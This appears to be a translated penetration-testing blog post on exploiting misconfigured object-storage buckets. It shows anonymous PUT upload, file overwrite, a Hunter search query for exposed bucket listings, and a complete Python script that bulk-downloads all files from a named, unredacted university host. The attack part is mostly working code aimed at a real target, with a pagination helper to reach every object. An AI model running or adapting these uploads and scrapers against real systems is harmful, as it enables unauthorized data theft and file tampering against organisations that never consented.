



PUT request: arbitrary file upload

This is usually the blunt case: send a plain PUT request and the file is uploaded.





The uploaded file can then be accessed successfully.




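The PUT upload shown in the screenshots can be sketched in a few lines. This is only a minimal sketch using the standard library: the helper names `build_put_request` and `put_object` and the URL in the usage note are hypothetical, and it assumes the bucket accepts anonymous PUT requests, which is exactly the misconfiguration being tested.

```python
import urllib.error
import urllib.request


def build_put_request(url: str, body: bytes,
                      content_type: str = "text/plain") -> urllib.request.Request:
    """Build (but do not send) a PUT request that uploads `body` to `url`."""
    return urllib.request.Request(
        url,
        data=body,
        method="PUT",
        headers={"Content-Type": content_type},
    )


def put_object(url: str, body: bytes) -> int:
    """Send the PUT request and return the HTTP status code."""
    try:
        with urllib.request.urlopen(build_put_request(url, body), timeout=30) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        # 4xx/5xx responses (for example 403 when anonymous writes are denied)
        return e.code
```

For example, `put_object("https://bucket.example.com/test.txt", b"put upload test")` would return 200 if the upload is accepted; the URL here is a placeholder, not one from the screenshots.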

File overwrite

Take the arbitrary-upload case above again and send the same upload request, but with the file contents changed.





Then access the file again: it has been overwritten successfully.









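Listing and download

First, you need a page that exposes the bucket listing.

You can search for one directly with an asset search engine. Using Hunter as an example: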

```
web.body="<ListBucketResult>"
```

The target is overseas anyway, so I didn't bother redacting it.





Then you can try downloading the files:

```python
import os
import socket
from urllib.parse import urlparse

import requests
from bs4 import BeautifulSoup  # the 'lxml-xml' parser below also needs lxml installed

BASE_URL = "https://ixuesncezy.xidian.edu.cn:4410/"
EXCLUDED_EXTENSIONS = {'null'}  # key suffixes to skip
DOWNLOAD_DIR = './downloaded_files/'

# Browser-like headers. 'br' is left out of Accept-Encoding because requests
# only decodes Brotli when an extra package is installed; without it the
# saved files would stay compressed.
HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
    'Accept': '*/*',
    'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Connection': 'keep-alive',
    'Referer': BASE_URL,
}

os.makedirs(DOWNLOAD_DIR, exist_ok=True)


def check_domain_connectivity(url):
    """Check whether the domain resolves."""
    domain = urlparse(url).hostname
    try:
        print(f"Checking domain: {domain}")
        socket.gethostbyname(domain)
        print(f"✓ Domain resolved: {domain}")
        return True
    except socket.gaierror as e:
        print(f"✗ Domain resolution failed: {domain} - {e}")
        return False
    except Exception as e:
        print(f"✗ Connectivity check failed: {e}")
        return False


def get_file_links(url):
    """Fetch the bucket listing and return the object keys."""
    try:
        print(f"Requesting: {url}")
        response = requests.get(url, timeout=30)
        if response.status_code != 200:
            raise Exception(f"Failed to retrieve the page: {response.status_code}")

        content = response.text
        print(f"✓ Got page content, length: {len(content)} characters")

        soup = BeautifulSoup(content, 'lxml-xml')
        keys = []
        for key_tag in soup.find_all('Key'):
            key = key_tag.text
            if key.endswith('/'):
                continue  # folder placeholder, nothing to download
            if not any(key.lower().endswith(ext) for ext in EXCLUDED_EXTENSIONS):
                keys.append(key)

        print(f"✓ Found {len(keys)} matching files")
        return keys
    except requests.exceptions.ConnectionError as e:
        print(f"✗ Connection error: {e}")
        raise
    except requests.exceptions.Timeout as e:
        print(f"✗ Request timed out: {e}")
        raise
    except Exception as e:
        print(f"✗ Failed to get file links: {e}")
        raise


def main():
    print("=" * 50)
    print("File downloader started")
    print("=" * 50)

    if not check_domain_connectivity(BASE_URL):
        print("\n❌ Domain unreachable, please check:")
        print("1. Whether the network connection works")
        print("2. Whether the domain is correct")
        print("3. Whether a proxy or VPN is required")
        print("4. Whether a firewall is blocking the connection")
        return

    try:
        file_paths = get_file_links(BASE_URL)
        if not file_paths:
            print("❌ No matching files found")
            return

        print(f"\nStarting download of {len(file_paths)} files...")
        print("-" * 50)

        success_count = 0
        failed_count = 0

        for i, file_path in enumerate(file_paths, 1):
            # Join with exactly one slash between the base URL and the key.
            file_url = BASE_URL.rstrip('/') + '/' + file_path.lstrip('/')
            # Files are saved flat, so keys sharing a basename overwrite each other.
            local_file_path = os.path.join(DOWNLOAD_DIR, os.path.basename(file_path))
            print(f"[{i}/{len(file_paths)}] Downloading: {os.path.basename(file_path)}")

            try:
                response = requests.get(file_url, stream=True, timeout=30, headers=HEADERS)
                if response.status_code == 200:
                    with open(local_file_path, 'wb') as file:
                        for chunk in response.iter_content(chunk_size=8192):
                            file.write(chunk)
                    print(f"✓ Downloaded: {os.path.basename(file_path)}")
                    success_count += 1
                else:
                    print(f"✗ Download failed {file_url}: HTTP {response.status_code}")
                    failed_count += 1
            except Exception as e:
                print(f"✗ Download error {file_url}: {e}")
                failed_count += 1

        print("-" * 50)
        if failed_count == 0:
            print(f"✅ Done! Succeeded: {success_count}/{len(file_paths)}")
        else:
            print(f"⚠️ Done! Succeeded: {success_count}/{len(file_paths)}, failed: {failed_count}")
    except Exception as e:
        print(f"\n❌ Program failed: {e}")
        print("Please check the network connection and whether the domain is correct")


if __name__ == "__main__":
    main()
```
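One caveat with the script above: it only reads the first page of the listing. S3-style listings are paginated (an `IsTruncated` flag plus a marker for the next page), so a large bucket will not show every key in one response. Below is a rough sketch of parsing one page with only the standard library. It assumes the classic S3 V1 listing format; `parse_listing` and `SAMPLE` are hypothetical names for illustration, and other providers may differ in details.

```python
import xml.etree.ElementTree as ET


def _local(tag: str) -> str:
    """Strip an XML namespace prefix: '{http://...}Key' -> 'Key'."""
    return tag.rsplit('}', 1)[-1]


def parse_listing(xml_text):
    """Return (keys, is_truncated, next_marker) for one ListBucketResult page."""
    root = ET.fromstring(xml_text)
    keys = []
    is_truncated = False
    next_marker = None
    for elem in root.iter():
        name = _local(elem.tag)
        if name == "Key":
            keys.append(elem.text or "")
        elif name == "IsTruncated":
            is_truncated = (elem.text or "").strip().lower() == "true"
        elif name == "NextMarker":
            next_marker = elem.text
    # Without a NextMarker element, the last key of the page serves as the marker.
    if is_truncated and next_marker is None and keys:
        next_marker = keys[-1]
    return keys, is_truncated, next_marker


# Made-up sample page for illustration only.
SAMPLE = """<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>demo</Name>
  <IsTruncated>true</IsTruncated>
  <Contents><Key>a/1.txt</Key></Contents>
  <Contents><Key>a/2.txt</Key></Contents>
</ListBucketResult>"""

keys, truncated, marker = parse_listing(SAMPLE)
print(keys, truncated, marker)
```

When `is_truncated` is true, the next page would be requested by appending `?marker=<next_marker>` to the listing URL and repeating until the flag turns false.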
